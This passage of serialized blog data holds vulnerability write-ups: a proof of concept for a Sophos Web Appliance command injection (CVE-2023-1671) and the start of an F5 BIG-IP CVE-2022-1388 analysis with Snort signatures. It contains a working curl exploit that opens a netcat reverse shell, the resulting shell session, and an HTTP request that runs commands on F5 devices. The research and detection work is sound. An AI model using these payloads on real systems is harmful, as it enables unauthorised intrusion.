",[1373,100376,5417],{"class":1397},[1373,100378,93923],{"class":1379},[1373,100380,1384],{"class":1383},[1373,100382,183],{"class":1387},[1373,100384,17472],{"class":1391},[1373,100386,183],{"class":1387},[1373,100388,47335],{"class":1383},[1373,100390,100083],{"class":4640},[1373,100392,7035],{"class":1383},[1373,100394,1388],{"class":1387},[1373,100396,100397],{"class":1391},"raw_category_id",[1373,100399,1388],{"class":1387},[1373,100401,34850],{"class":1383},[1373,100403,100404,100406,100408,100410,100412,100415,100417,100419],{"class":1375,"line":4947},[1373,100405,100257],{"class":1383},[1373,100407,100300],{"class":4640},[1373,100409,5417],{"class":1397},[1373,100411,4656],{"class":1383},[1373,100413,100414],{"class":4640},"catParts",[1373,100416,7035],{"class":1383},[1373,100418,445],{"class":5467},[1373,100420,34699],{"class":1383},[1373,100422,100423],{"class":1375,"line":4952},[1373,100424,16207],{"class":1383},[1373,100426,100427],{"class":1375,"line":6776},[1373,100428,6520],{"emptyLinePlaceholder":237},[1373,100430,100431,100433,100435,100437,100439,100441,100443],{"class":1375,"line":6781},[1373,100432,100104],{"class":1383},[1373,100434,100260],{"class":4640},[1373,100436,5417],{"class":1397},[1373,100438,100204],{"class":1379},[1373,100440,34467],{"class":1383},[1373,100442,13937],{"class":4640},[1373,100444,4680],{"class":1383},[1373,100446,100447,100449,100451,100453,100455,100457,100459],{"class":1375,"line":7524},[1373,100448,100104],{"class":1383},[1373,100450,100300],{"class":4640},[1373,100452,5417],{"class":1397},[1373,100454,100204],{"class":1379},[1373,100456,34467],{"class":1383},[1373,100458,85021],{"class":4640},[1373,100460,4680],{"class":1383},[1373,100462,100463,100466,100468,100470,100472,100474,100476,100478,100480,100482,100484,100486,100489,100491,100494,100496,100498,100500,100502,100504,100506,100508,100510],{"class":1375,"line":7530},[1373,100464,100465],{"class":34505},"                        
$this",[1373,100467,4667],{"class":1397},[1373,100469,19064],{"class":4640},[1373,100471,4667],{"class":1397},[1373,100473,75355],{"class":7297},[1373,100475,1384],{"class":1383},[1373,100477,183],{"class":1387},[1373,100479,67201],{"class":1391},[1373,100481,183],{"class":1387},[1373,100483,5437],{"class":1383},[1373,100485,183],{"class":1387},[1373,100487,100488],{"class":1391},"cmd = '",[1373,100490,4644],{"class":1383},[1373,100492,100493],{"class":4640},"packer",[1373,100495,4656],{"class":1383},[1373,100497,13937],{"class":4640},[1373,100499,4656],{"class":1383},[1373,100501,39933],{"class":4640},[1373,100503,4656],{"class":1383},[1373,100505,85021],{"class":4640},[1373,100507,1388],{"class":1391},[1373,100509,183],{"class":1387},[1373,100511,4680],{"class":1383},[1373,100513,100514,100516,100519,100521,100523,100525,100527,100529,100531,100533,100535,100537,100539,100541,100543,100546,100548],{"class":1375,"line":7546},[1373,100515,100104],{"class":1383},[1373,100517,100518],{"class":4640},"result ",[1373,100520,5417],{"class":1397},[1373,100522,2366],{"class":1379},[1373,100524,1384],{"class":1383},[1373,100526,183],{"class":1387},[1373,100528,4644],{"class":1383},[1373,100530,100493],{"class":4640},[1373,100532,4656],{"class":1383},[1373,100534,13937],{"class":4640},[1373,100536,4656],{"class":1383},[1373,100538,39933],{"class":4640},[1373,100540,4656],{"class":1383},[1373,100542,85021],{"class":4640},[1373,100544,100545],{"class":1391}," 2>&1",[1373,100547,183],{"class":1387},[1373,100549,4680],{"class":1383},[18,100551,100552,100553,100556,100557,100560],{},"Note that user-controlled input is still processed through PHP's ",[886,100554,100555],{},"escapeshellarg"," function, which will escape ",[1131,100558,100559],{},"and add"," single quotes to a shell argument. 
You may be able to see where this is going.",[1920,100562,100564],{"id":100563},"developing-an-rce-poc","Developing an RCE PoC",[18,100566,100567,100568,100571,100572,100575,100576,982,100578,100580,100581,100583,100584,100586],{},"Exploitation is relatively straightforward. ",[886,100569,100570],{},"UsrBlocked.php"," is routed through ",[886,100573,100574],{},"\u002Findex.php?c=blocked",", and the required ",[886,100577,6284],{},[886,100579,6946],{}," parameters are supplied thereafter. Since the ",[886,100582,100123],{}," parameter is Base64-encoded, it's perfect for our command injection. No escaping or other encoding is necessary! The full ",[886,100585,1557],{}," command to RCE is demonstrated below:",[100588,100589,100590],"shell-prompt",{},[1354,100591,100594],{"className":100592,"code":100593,"language":1359,"meta":219},[1357],"wvu@kharak:~$ curl -k --trace-ascii % \"https:\u002F\u002F192.168.56.108\u002Findex.php?c=blocked&action=continue\" -d \"args_reason=filetypewarn&url=$RANDOM&filetype=$RANDOM&user=$RANDOM&user_encoded=$(echo -n \"';nc -e \u002Fbin\u002Fsh 192.168.56.1 4444 #\" | base64)\"\n#snip\n=> Send header, 184 bytes (0xb8)\n0000: POST \u002Findex.php?c=blocked&action=continue HTTP\u002F1.1\n0034: Host: 192.168.56.108\n004a: User-Agent: curl\u002F7.88.1\n0063: Accept: *\u002F*\n0070: Content-Length: 120\n0085: Content-Type: application\u002Fx-www-form-urlencoded\n00b6:\n=> Send data, 120 bytes (0x78)\n0000: args_reason=filetypewarn&url=16625&filetype=5831&user=4525&user_\n0040: encoded=JztuYyAtZSAvYmluL3NoIDE5Mi4xNjguNTYuMSA0NDQ0ICM=\n",[886,100595,100593],{"__ignoreMap":219},[18,100597,100598,100599,100602,100603,50357],{},"How ",[1131,100600,100601],{},"exactly"," the command injection works is perhaps best illustrated by the following ",[886,100604,100605],{},"strace",[1354,100607,100609],{"className":92494,"code":100608,"language":28578,"meta":219,"style":219},"[pid 22283] execve(\"\u002Fbin\u002Fsh\", [\"sh\", \"-c\", 
\"\u002Fopt\u002Fws\u002Fbin\u002Fftsblistpack '16625' ''\\\\'';nc -e \u002Fbin\u002Fsh 192.168.56.1 4444 #' '5831' 2>&1\"], [\u002F* 16 vars *\u002F]) = 0\n[pid 22284] execve(\"\u002Fopt\u002Fws\u002Fbin\u002Fftsblistpack\", [\"\u002Fopt\u002Fws\u002Fbin\u002Fftsblistpack\", \"16625\", \"';nc -e \u002Fbin\u002Fsh 192.168.56.1 4444 #\", \"5831\"], [\u002F* 16 vars *\u002F]) = 0\n[pid 22285] execve(\"\u002Fbin\u002Fsh\", [\"sh\", \"-c\", \"\u002Fopt\u002Fws\u002Fbin\u002Fsblistpack '16625' '';nc -e \u002Fbin\u002Fsh 192.168.56.1 4444 #' '5831' '\u002Fpersist\u002Fwsa\u002Fftsblist.in' '\u002Fpersist\u002Fwsa\u002Fftsblist.kvlist'\"], [\u002F* 16 vars *\u002F]) = 0\n[pid 22288] execve(\"\u002Fopt\u002Fws\u002Fbin\u002Fsblistpack\", [\"\u002Fopt\u002Fws\u002Fbin\u002Fsblistpack\", \"16625\", \"\"], [\u002F* 16 vars *\u002F]) = 0\n[pid 22285] --- SIGCHLD (Child exited) @ 0 (0) ---\n[pid 22299] execve(\"\u002Fbin\u002Fnc\", [\"nc\", \"-e\", \"\u002Fbin\u002Fsh\", \"192.168.56.1\", \"4444\"], [\u002F* 16 vars *\u002F]) = 0\n[pid 22299] execve(\"\u002Fbin\u002Fsh\", [\"sh\"], [\u002F* 16 vars *\u002F]) = 0\n",[886,100610,100611,100616,100621,100626,100631,100636,100641],{"__ignoreMap":219},[1373,100612,100613],{"class":1375,"line":1376},[1373,100614,100615],{},"[pid 22283] execve(\"\u002Fbin\u002Fsh\", [\"sh\", \"-c\", \"\u002Fopt\u002Fws\u002Fbin\u002Fftsblistpack '16625' ''\\\\'';nc -e \u002Fbin\u002Fsh 192.168.56.1 4444 #' '5831' 2>&1\"], [\u002F* 16 vars *\u002F]) = 0\n",[1373,100617,100618],{"class":1375,"line":220},[1373,100619,100620],{},"[pid 22284] execve(\"\u002Fopt\u002Fws\u002Fbin\u002Fftsblistpack\", [\"\u002Fopt\u002Fws\u002Fbin\u002Fftsblistpack\", \"16625\", \"';nc -e \u002Fbin\u002Fsh 192.168.56.1 4444 #\", \"5831\"], [\u002F* 16 vars *\u002F]) = 0\n",[1373,100622,100623],{"class":1375,"line":1266},[1373,100624,100625],{},"[pid 22285] execve(\"\u002Fbin\u002Fsh\", [\"sh\", \"-c\", \"\u002Fopt\u002Fws\u002Fbin\u002Fsblistpack '16625' '';nc -e 
\u002Fbin\u002Fsh 192.168.56.1 4444 #' '5831' '\u002Fpersist\u002Fwsa\u002Fftsblist.in' '\u002Fpersist\u002Fwsa\u002Fftsblist.kvlist'\"], [\u002F* 16 vars *\u002F]) = 0\n",[1373,100627,100628],{"class":1375,"line":1852},[1373,100629,100630],{},"[pid 22288] execve(\"\u002Fopt\u002Fws\u002Fbin\u002Fsblistpack\", [\"\u002Fopt\u002Fws\u002Fbin\u002Fsblistpack\", \"16625\", \"\"], [\u002F* 16 vars *\u002F]) = 0\n",[1373,100632,100633],{"class":1375,"line":4692},[1373,100634,100635],{},"[pid 22285] --- SIGCHLD (Child exited) @ 0 (0) ---\n",[1373,100637,100638],{"class":1375,"line":4724},[1373,100639,100640],{},"[pid 22299] execve(\"\u002Fbin\u002Fnc\", [\"nc\", \"-e\", \"\u002Fbin\u002Fsh\", \"192.168.56.1\", \"4444\"], [\u002F* 16 vars *\u002F]) = 0\n",[1373,100642,100643],{"class":1375,"line":4756},[1373,100644,100645],{},"[pid 22299] execve(\"\u002Fbin\u002Fsh\", [\"sh\"], [\u002F* 16 vars *\u002F]) = 0\n",[18,100647,100648,100649,100652,100653,100655,100656,100659,100660,100663],{},"When ",[886,100650,100651],{},"';nc -e \u002Fbin\u002Fsh 192.168.56.1 4444 #"," is injected into ",[886,100654,100022],{},", the input is wrapped in single quotes, resulting in the \"sanitized\" input ",[886,100657,100658],{},"'';nc -e \u002Fbin\u002Fsh 192.168.56.1 4444 #'",", which will close the opening quote, execute a ",[886,100661,100662],{},"netcat"," reverse shell, and comment out the rest of the command line. 
If you had a listener set up, you'd catch the shell:",[100588,100665,100666],{},[1354,100667,100670],{"className":100668,"code":100669,"language":1359,"meta":219},[1357],"wvu@kharak:~$ rlwrap -rS '$ ' -nH \u002Fdev\u002Fnull ncat -lkv 4444\nNcat: Version 7.93 ( https:\u002F\u002Fnmap.org\u002Fncat )\nNcat: Listening on :::4444\nNcat: Listening on 0.0.0.0:4444\n$ Ncat: Connection from 192.168.56.108.\nNcat: Connection from 192.168.56.108:56426.\n$ id\nuid=1000(spiderman) gid=1000(spiderman) groups=1000(spiderman),16(cron),44(tproxyd),45(wdx)\n$ uname -a\nLinux foo 3.2.89 #1 SMP Tue Mar 29 00:03:09 UTC 2022 i686 GNU\u002FLinux\n$\n",[886,100671,100669],{"__ignoreMap":219},[18,100673,100674],{},[1131,100675,100676],{},"Insert Spider-Man Pointing meme.",[1920,100678,100680],{"id":100679},"hunting-for-iocs","Hunting for IOCs",[18,100682,100683,100684,100687],{},"A single line is appended to the ",[886,100685,100686],{},"\u002Flog\u002Fui_access_log"," file once the HTTP request returns a response:",[1354,100689,100692],{"className":100690,"code":100691,"language":1359,"meta":219},[1357],"192.168.56.1 - - [19\u002FApr\u002F2023:19:46:21 +0000] \"POST \u002Findex.php?c=blocked&action=continue HTTP\u002F1.1\" 302 - \"-\" \"curl\u002F7.88.1\"\n",[886,100693,100691],{"__ignoreMap":219},[18,100695,100696,100697,100699],{},"It isn't much, but it's something to look for when hunting for exploitation. Note that writing the log entry may block on command execution. 
Additionally, the previous ",[886,100698,100605],{}," output can be used for process detections.",[1920,100701,2850],{"id":2849},[61,100703,36665],{"id":36664},[1789,100705,100706],{},[25,100707,100708,10515,100712],{},[47,100709,100710],{"href":100710,"rel":100711},"https:\u002F\u002Fwww.sophos.com\u002Fen-us\u002Fsecurity-advisories\u002Fsophos-sa-20230404-swa-rce",[51],[47,100713,36677],{"href":36676},[2901,100715,100716],{},"html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: 
var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .sRxSC, html code.shiki .sRxSC{--shiki-light:#39ADB5;--shiki-light-font-style:italic;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#F92672;--shiki-sepia-font-style:inherit}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .sMLJd, html code.shiki .sMLJd{--shiki-light:#6182B8;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#66D9EF}html pre.shiki code .sYThS, html code.shiki .sYThS{--shiki-light:#F76D47;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .ss7Ak, html code.shiki .ss7Ak{--shiki-light:#90A4AE;--shiki-light-font-style:italic;--shiki-default:#6A737D;--shiki-default-font-style:inherit;--shiki-dark:#6A737D;--shiki-dark-font-style:inherit;--shiki-sepia:#88846F;--shiki-sepia-font-style:inherit}html pre.shiki code .sSBr1, html code.shiki .sSBr1{--shiki-light:#39ADB5;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#FD971F}html pre.shiki code .sD0ED, html code.shiki 
.sD0ED{--shiki-light:#6182B8;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}",{"title":219,"searchDepth":220,"depth":220,"links":100718},[100719],{"id":36664,"depth":220,"text":36665},"2023-04-21","CVE-2023-1671 is a pre-authenticated command injection in Sophos Web Appliance. In this blog post, VulnCheck researchers analyze the vulnerability and develop a proof of concept (PoC) for it.",{"slug":100723},"cve-2023-1671-analysis","\u002Fblog\u002Fcve-2023-1671-analysis",{"title":99869,"description":100721},"blog\u002Fcve-2023-1671-analysis",[242],"KsKFXd7fPY5GMbSe-1Ml8szjZO6AF6W4Im0-ty3Foq0",{"id":100730,"title":100731,"articles":100732,"authors":100741,"body":100743,"date":103268,"description":103269,"extension":234,"image":7,"link":7,"meta":103270,"navigation":237,"path":103272,"seo":103273,"series":7,"stem":103274,"subtype":7,"tags":103275,"__hash__":103276},"blog\u002Fblog\u002Fnew-cve-2022-1388.md","Finding Something New About CVE-2022-1388",[100733,100737],{"title":100734,"source":11233,"link":100735,"date":100736},"Under the Weather, Beating Roulette, Monitoring Macs, ^ XBMC Glory Days","https:\u002F\u002Fwww.scmagazine.com\u002Fpodcast-segment\u002Funder-the-weather-taxonomy-beating-roulette-monitoring-macs-xbmc-glory-days-psw-781","2023-04-19",{"title":100738,"source":100739,"link":100740,"date":84768},"So, You Think of Cybersecurity Only as a Cost Center? 
Think Again.","National Law Review","https:\u002F\u002Fwww.natlawreview.com\u002Farticle\u002Fso-you-think-cybersecurity-only-cost-center-think-again",[100742],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":100744,"toc":103254},[100745,100757,100799,100827,100830,100834,100837,100853,100867,100950,100953,100957,100960,100972,100975,101216,101219,101339,101342,101507,101510,101514,101517,101526,101530,101538,101551,101557,101702,101705,101729,101741,101771,101787,101810,101813,101817,101839,101965,101974,101978,101999,102122,102130,102136,102140,102157,102305,102313,102336,102341,102344,102348,102361,102369,102404,102410,102566,102569,102672,102675,102681,102693,102760,102763,102767,102786,102791,102794,102808,102823,102829,102855,102861,102886,102898,103056,103060,103063,103213,103223,103236,103238,103244,103251],[18,100746,100747,100748,100753,100754,59],{},"One of the things we do at VulnCheck is ",[47,100749,100752],{"href":100750,"rel":100751},"https:\u002F\u002Fwww.darkreading.com\u002Fvulnerabilities-threats\u002Fthe-overlooked-problem-of-n-day-vulnerabilities",[51],"n-day"," analysis. That can include analysis of well-known, deeply researched, and widely exploited vulnerabilities. When we tackle that type of issue, we aim to learn something new, novel, or, at the very least, interesting. We recently took that approach analyzing ",[47,100755,92074],{"href":92072,"rel":100756},[51],[18,100758,100759,100760,100765,100766,10515,100771,1246,100776,100781,100782,100787,100788,100793,100794,59],{},"CVE-2022-1388 is an authentication bypass vulnerability affecting F5 Big-IP products. When CVE-2022-1388 was disclosed in May 2022, there were only a ",[47,100761,100764],{"href":100762,"rel":100763},"https:\u002F\u002Ftrends.shodan.io\u002Fsearch?query=http.title%3A%22BIG-IP%26reg%3B-Redirect%22+%2B%22Server%22&reg%3B-+Redirect%22++%22Server%22=#facet\u002Foverview",[51],"few thousand internet-facing affected systems",". 
But there was no stopping the infosec hype train. Multiple research organizations published ",[47,100767,100770],{"href":100768,"rel":100769},"https:\u002F\u002Ftwitter.com\u002Fvcslab\u002Fstatus\u002F1523259088259346432",[51],"redacted",[47,100772,100775],{"href":100773,"rel":100774},"https:\u002F\u002Ftwitter.com\u002Fptswarm\u002Fstatus\u002F1522873828896034816",[51],"proof of concepts",[47,100777,100780],{"href":100778,"rel":100779},"https:\u002F\u002Fweb.archive.org\u002Fweb\u002F20220513035505\u002Fhttps:\u002F\u002Ftwitter.com\u002FGossiTheDog\u002Fstatus\u002F1521964444380708865",[51],"Kevin Beaumont"," was tweeting about honeypot exploitation, randoms were dropping exploit ",[47,100783,100786],{"href":100784,"rel":100785},"https:\u002F\u002Fweb.archive.org\u002Fweb\u002F20220509072529\u002Fhttps:\u002F\u002Ftwitter.com\u002FAnnaViolet20\u002Fstatus\u002F1523564632140509184",[51],"screenshots",", and reporters were ",[47,100789,100792],{"href":100790,"rel":100791},"https:\u002F\u002Fwww.youtube.com\u002Fwatch?v=1IChiQZM7EY&t=105s",[51],"mistaking jokes about an inside job"," for reality. Eventually, most of the speculation and fear-mongering were put to bed by an excellent deep-dive analysis from ",[47,100795,100798],{"href":100796,"rel":100797},"https:\u002F\u002Fwww.horizon3.ai\u002Ff5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive\u002F",[51],"Horizon3.ai",[18,100800,100801,100802,1255,100806,100810,100811,100815,100816,100821,100822,100826],{},"When all the hype died down, the vulnerability was quite well-known. It’s been featured in research write-ups. 
There’s a Metasploit ",[47,100803,49176],{"href":100804,"rel":100805},"https:\u002F\u002Fgithub.com\u002Frapid7\u002Fmetasploit-framework\u002Fblob\u002Ffef3796d43f851d286f1909c6021c19fa7c449d4\u002Fmodules\u002Fexploits\u002Flinux\u002Fhttp\u002Ff5_icontrol_rce.rb#L34",[51],[47,100807,86601],{"href":100808,"rel":100809},"https:\u002F\u002Fviz.greynoise.io\u002Fquery\u002F?gnql=tags%3A%22F5%20BIG-IP%20iControl%20REST%20Authentication%20Bypass%22",[51]," tag. ",[47,100812,31654],{"href":100813,"rel":100814},"https:\u002F\u002Fdashboard.shadowserver.org\u002Fstatistics\u002Fhoneypot\u002Fmonitoring\u002Fvulnerability\u002F?category=monitoring&statistic=unique_ips&iot=No&cisa_kev=yes",[51]," identifies the vulnerability in their honeypot network. It was even named one of the [top vulnerabilities in ",[47,100817,100820],{"href":100818,"rel":100819},"https:\u002F\u002Fwww.infosecurity-magazine.com\u002Fblogs\u002Ftop-security-vulnerabilities\u002F",[51],"2022",", and added to the ",[47,100823,100825],{"href":2864,"rel":100824},[51],"CISA KEV Catalog",". What more could be said about this vulnerability?",[18,100828,100829],{},"Well, if you don’t look, you’ll never know.",[61,100831,100833],{"id":100832},"exploit-summarization","Exploit Summarization",[18,100835,100836],{},"Before we go off on our hunt, it’s useful to know what a standard CVE-2022-1388 exploit looks like. 
Horizon3.ai’s technical write-up provides the following four elements (verbatim) that are required to exploit CVE-2022-1388:",[1925,100838,100839],{},[1789,100840,100841,100844,100847,100850],{},[25,100842,100843],{},"Connection header must include X-F5-Auth-Token",[25,100845,100846],{},"X-F5-Auth-Token header must be present",[25,100848,100849],{},"Host header must be localhost \u002F 127.0.0.1 or the Connection header must include X-Forwarded-Host",[25,100851,100852],{},"Auth header must be set with the admin username and any password",[18,100854,100855,100856,100859,100860,100863,100864,100866],{},"The four bullet points describe ",[1131,100857,100858],{},"the authentication bypass",". Additionally, Horizon3.ai pointed out an HTTP endpoint that would allow attackers, after they exploited CVE-2022-1388, to execute arbitrary commands. That endpoint was ",[886,100861,100862],{},"\u002Fmgmt\u002Ftm\u002Futil\u002Fbash",". Horizon3.ai also offered the following HTTP request as a proof of concept (this will execute the Linux command ",[886,100865,26412],{}," on the remote target):",[1354,100868,100870],{"className":31740,"code":100869,"language":2186,"meta":219,"style":219},"POST \u002Fmgmt\u002Ftm\u002Futil\u002Fbash HTTP\u002F1.1\nHost: 127.0.0.1\nAuthorization: Basic YWRtaW46aG9yaXpvbjM=\nX-F5-Auth-Token: asdf\nUser-Agent: curl\u002F7.82.0\nConnection: X-F5-Auth-Token\nAccept: *\u002F*\nContent-Length: 39\n{“command”:”run”,”utilCmdArgs”:”-c id”}\n",[886,100871,100872,100881,100888,100899,100907,100914,100922,100933,100940],{"__ignoreMap":219},[1373,100873,100874,100876,100879],{"class":1375,"line":1376},[1373,100875,6946],{"class":2206},[1373,100877,100878],{"class":1391}," \u002Fmgmt\u002Ftm\u002Futil\u002Fbash",[1373,100880,35589],{"class":1391},[1373,100882,100883,100885],{"class":1375,"line":220},[1373,100884,99283],{"class":2206},[1373,100886,100887],{"class":5467}," 
127.0.0.1\n",[1373,100889,100890,100893,100896],{"class":1375,"line":1266},[1373,100891,100892],{"class":2206},"Authorization:",[1373,100894,100895],{"class":1391}," Basic",[1373,100897,100898],{"class":1391}," YWRtaW46aG9yaXpvbjM=\n",[1373,100900,100901,100904],{"class":1375,"line":1852},[1373,100902,100903],{"class":2206},"X-F5-Auth-Token:",[1373,100905,100906],{"class":1391}," asdf\n",[1373,100908,100909,100911],{"class":1375,"line":4692},[1373,100910,99291],{"class":2206},[1373,100912,100913],{"class":1391}," curl\u002F7.82.0\n",[1373,100915,100916,100919],{"class":1375,"line":4724},[1373,100917,100918],{"class":2206},"Connection:",[1373,100920,100921],{"class":1391}," X-F5-Auth-Token\n",[1373,100923,100924,100927,100929,100931],{"class":1375,"line":4756},[1373,100925,100926],{"class":2206},"Accept:",[1373,100928,19113],{"class":6761},[1373,100930,2180],{"class":1391},[1373,100932,35618],{"class":6761},[1373,100934,100935,100937],{"class":1375,"line":4768},[1373,100936,99333],{"class":2206},[1373,100938,100939],{"class":5467}," 39\n",[1373,100941,100942,100944,100947],{"class":1375,"line":4792},[1373,100943,9149],{"class":1383},[1373,100945,100946],{"class":2206},"“command”:”run”,”utilCmdArgs”:”-c",[1373,100948,100949],{"class":1391}," id”}\n",[18,100951,100952],{},"That’s the basis of exploitation and what a generic CVE-2022-1388 exploit looks like on the wire. Our goal for this n-day analysis is to iterate on public knowledge and find something new and\u002For interesting to say.",[61,100954,100956],{"id":100955},"open-source-detections","Open Source Detections",[18,100958,100959],{},"A good place to start on this sort of task is collecting open-source exploit detections. Detections often summarize the heart of the problem in an easily digestible signature. Additionally, we can determine if we’re on an interesting path of inquiry by comparing the detections against any new exploits we devise. If all else fails (e.g. 
we can’t find any new or interesting exploitation techniques), finding a weakness in a commonly used signature is an interesting little tidbit to share with customers.",[18,100961,100962,100963,100967,100968,100971],{},"We are aware of five open-source Snort 2.9 signatures for CVE-2022-1388. Three in the ",[47,100964,92083],{"href":100965,"rel":100966},"https:\u002F\u002Frules.emergingthreats.net\u002Fopen\u002F",[51]," (although we’ll only discuss one because they are all tightly linked), and two in the ",[47,100969,92088],{"href":92086,"rel":100970},[51],". The rules, modified for readability and with some of the metadata stripped for brevity, follow.",[18,100973,100974],{},"Emerging Threats Snort 2.9 Signature ID 2036556:",[1354,100976,100980],{"className":100977,"code":100978,"language":100979,"meta":219,"style":219},"language-py shiki shiki-themes material-theme-lighter github-light github-dark monokai","alert tcp any any -> $HOME_NET $HTTP_PORTS (msg:\"ET EXPLOIT F5 BIG-IP iControl REST authentication bypass attempt (CVE-2022-1388) M2\"; \\\n flow:established,to_server; \\\n content:!\"GET\"; http_method; \\\n content:\"\u002Fmgmt\u002Ftm\"; http_uri; depth:8; \\\n content:\"Authorization|3a 20|Basic YWRtaW46\"; http_header; \\\n content:\"x-F5-Auth-Token\"; http_header; nocase; \\\n pcre:\"\u002F^Connection\\x3a\\x20[^\\r\\n]+x-F5-Auth-Token\u002FHmi\"; \\\n content:!\"Referer|3a 20|\"; http_header; \\\n content:\"X-F5-Auth-Token|3a 20|\"; fast_pattern; http_header; \\\n classtype:trojan-activity; sid:2036556; rev:2;)\n","py",[886,100981,100982,101023,101040,101059,101083,101101,101119,101148,101167,101185],{"__ignoreMap":219},[1373,100983,100984,100987,100989,100991,100994,100996,100999,101001,101004,101006,101009,101011,101013,101016,101018,101021],{"class":1375,"line":1376},[1373,100985,100986],{"class":4640},"alert tcp ",[1373,100988,99083],{"class":1379},[1373,100990,99071],{"class":1379},[1373,100992,100993],{"class":28571}," 
->",[1373,100995,4656],{"class":28571},[1373,100997,100998],{"class":2326},"HOME_NET",[1373,101000,4656],{"class":28571},[1373,101002,101003],{"class":11735},"HTTP_PORTS ",[1373,101005,1384],{"class":1383},[1373,101007,101008],{"class":11735},"msg",[1373,101010,4606],{"class":1383},[1373,101012,183],{"class":1387},[1373,101014,101015],{"class":1391},"ET EXPLOIT F5 BIG-IP iControl REST authentication bypass attempt (CVE-2022-1388) M2",[1373,101017,183],{"class":1387},[1373,101019,101020],{"class":11735},"; ",[1373,101022,99089],{"class":1383},[1373,101024,101025,101028,101030,101033,101035,101038],{"class":1375,"line":220},[1373,101026,101027],{"class":11735}," flow",[1373,101029,4606],{"class":1383},[1373,101031,101032],{"class":11735},"established",[1373,101034,5437],{"class":1383},[1373,101036,101037],{"class":11735},"to_server; ",[1373,101039,99089],{"class":1383},[1373,101041,101042,101044,101046,101048,101050,101052,101054,101057],{"class":1375,"line":1266},[1373,101043,51846],{"class":11735},[1373,101045,4606],{"class":1383},[1373,101047,16090],{"class":11735},[1373,101049,183],{"class":1387},[1373,101051,6284],{"class":1391},[1373,101053,183],{"class":1387},[1373,101055,101056],{"class":11735},"; http_method; ",[1373,101058,99089],{"class":1383},[1373,101060,101061,101063,101065,101067,101070,101072,101075,101077,101079,101081],{"class":1375,"line":1852},[1373,101062,51846],{"class":11735},[1373,101064,4606],{"class":1383},[1373,101066,183],{"class":1387},[1373,101068,101069],{"class":1391},"\u002Fmgmt\u002Ftm",[1373,101071,183],{"class":1387},[1373,101073,101074],{"class":11735},"; http_uri; 
depth",[1373,101076,4606],{"class":1383},[1373,101078,37681],{"class":5467},[1373,101080,101020],{"class":11735},[1373,101082,99089],{"class":1383},[1373,101084,101085,101087,101089,101091,101094,101096,101099],{"class":1375,"line":4692},[1373,101086,51846],{"class":11735},[1373,101088,4606],{"class":1383},[1373,101090,183],{"class":1387},[1373,101092,101093],{"class":1391},"Authorization|3a 20|Basic YWRtaW46",[1373,101095,183],{"class":1387},[1373,101097,101098],{"class":11735},"; http_header; ",[1373,101100,99089],{"class":1383},[1373,101102,101103,101105,101107,101109,101112,101114,101117],{"class":1375,"line":4724},[1373,101104,51846],{"class":11735},[1373,101106,4606],{"class":1383},[1373,101108,183],{"class":1387},[1373,101110,101111],{"class":1391},"x-F5-Auth-Token",[1373,101113,183],{"class":1387},[1373,101115,101116],{"class":11735},"; http_header; nocase; ",[1373,101118,99089],{"class":1383},[1373,101120,101121,101124,101126,101128,101131,101134,101137,101139,101142,101144,101146],{"class":1375,"line":4756},[1373,101122,101123],{"class":11735}," 